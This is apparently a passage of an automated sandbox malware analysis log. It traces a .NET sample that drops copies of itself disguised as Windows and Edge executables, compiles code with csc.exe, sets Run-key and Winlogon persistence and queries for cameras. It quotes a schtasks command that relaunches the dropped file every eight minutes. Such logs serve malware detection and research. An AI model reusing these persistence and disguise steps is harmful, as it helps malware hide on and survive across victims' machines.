                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: winnsi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: amsi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: userenv.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dwrite.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: winmm.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: winmmbase.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: mmdevapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: devobj.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ksuser.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: avrt.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: edputil.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: audioses.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: powrprof.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: umpdc.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: msacm32.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: midimap.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: windowscodecs.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ntmarta.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dpapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: propsys.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: dlnashext.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: wpdshext.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: urlmon.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: iertutil.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: srvcli.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: netutils.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: windows.staterepositoryps.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: wintypes.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: appresolver.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: bcp47langs.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: slc.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: sppc.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: sspicli.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: mscoree.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: apphelp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: version.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: uxtheme.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: windows.storage.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: wldp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: profapi.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Section loaded: sspicli.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: mscoree.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: apphelp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: version.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: wldp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: profapi.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Directory created: C:\Program Files\7-Zip\Lang\upfc.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Directory created: C:\Program Files\7-Zip\Lang\ea1d8f6d871115
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static file information: File size 1912832 > 1048576
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d2800
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: System.pdb source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.cs .Net Code: Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777245)),Type.GetTypeFromHandle(FOTlpGLFU55Aewft1s6.rKxtA5ajJVx(16777259))})
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Static PE information: section name: .text entropy: 7.539794011288274
                              Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 7.539794011288274
                              Source: llflCdrMcgGB.exe.0.dr Static PE information: section name: .text entropy: 7.539794011288274
                              Source: upfc.exe.0.dr Static PE information: section name: .text entropy: 7.539794011288274
                              Source: upfc.exe0.0.dr Static PE information: section name: .text entropy: 7.539794011288274

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: unknown - Executable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - Renamed to system file: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Program Files\7-Zip\Lang\upfc.exe
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - File created: C:\Users\user\Desktop\AHphtSeX.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - File created: C:\Users\user\Desktop\jjSkKJFG.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\user\Desktop\PDlWdMMS.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\user\Desktop\wlyrJHCD.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - File created: C:\Users\user\Desktop\rUKsZmvt.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\user\Desktop\YPnuykix.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\user\Desktop\FUSHtkHk.log
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - File created: C:\Users\user\Desktop\CUcqaUVf.log
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Recovery\llflCdrMcgGB.exe

                              Boot Survival

                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - File created: C:\Users\All Users\Application Data\Start Menu\55b276f4edf653
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe - Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe - Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
